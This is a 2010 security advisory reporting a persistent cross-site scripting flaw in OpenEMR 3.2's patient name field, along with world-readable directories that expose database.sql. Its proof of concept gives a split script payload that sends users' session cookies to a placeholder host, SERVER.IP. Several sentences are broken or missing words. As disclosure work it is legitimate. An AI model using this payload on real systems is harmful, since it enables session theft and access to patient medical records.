OpenEMR Electronic Medical Record Software 3.2 - Multiple Vulnerabilities
|| CVE: N/A
|Author: David Shaw
||Vulnerable App: N/A
Redspin Security Notice -- RSN-2010-01
Multiple vulnerabilities in OpenEMR Electronic Medical Record Software
Quote from http://www.oemr.org/
OpenEMR is a free medical practice management, electronic medical records,
prescription writing, and medical billing application. These programs are
referred to as electronic health records. OpenEMR is licensed under the
Gnu Public License (General GPL). It is a free open source replacement for
medical applications such as Medical Manager, Health Pro, and Misys. It
support for EDI billing to clearing houses such as Availity, MD-Online,
and ZirMED using ANSI X12.
An issue was discovered with the OpenEMR standard installation.
There exists a persistent cross-site scripting (XSS) attack vector,
in which a patient may be maliciously named in a way that will send session
to a third party web host.
Vulnerable Product : OpenEMR 3.2
Vulnerability Type : Session-stealing XSS & Directory Listing
Discovered by : David Shaw (dshaw () redspin com)
Bug Discovered : May 14, 2010
Vendor Advised : June 1, 2010
Vendor Response : June 2, 2010
Patch Released : June 2, 2010
Public Disclosure : June 23, 2010
Due to an incorrectly sanitized input in the "patient name" field, it is
possible to create a malformed patient name that will translate into a
persistent cross site scripting exploit.
Due to the nature of the form, "First Name" and "Last Name" are reversed in
and continue on to "first name."
Furthermore, there is a comma in between these two outputs which must be
working demonstration of this persistent XSS is available in the "Proof of
Concept" section of this notice.
In addition to the cross-site scripting vulnerability, certain sensitive
directories are open by default and world-readable. For example, the
database.sql file may be read at http://server/openemr/sql/database.sql
Proof of Concept
Bug #1: Persistent Cross-Site Scripting
Once logged into OpenEMR, navigate to Management->New/Search. The resulting
menu will have form inputs for patient information. The malicious
input is as follows:
(First Name): */I.src='http://SERVER.IP/'+encodeURI(C);</script>
(Last Name): <script>var C=document.cookie;var I=new Image; /*
The resulting statement in the output is:
var I=new Image;
When this patient has been inserted, it will show up as a blank name in the
patient database. However, when any user attempts to search for a patient
or view the list of existing patients, his session ID is sent (silently)
to web server logs (in this case, to SERVER.IP).
A patch was released on June 2, 2010 which mitigates this persistent
scripting attack vector. This script is located on OpenEMR's Sourceforge
As part of its response to this problem, the OpenEMR project released an
version of this advisory on their Sourceforge developer forum. The original
thread is located at:
Out of respect for OpenEMR developers, the release of this advisory was
until a working patch was released out--despite having an already made the
public by their own choice.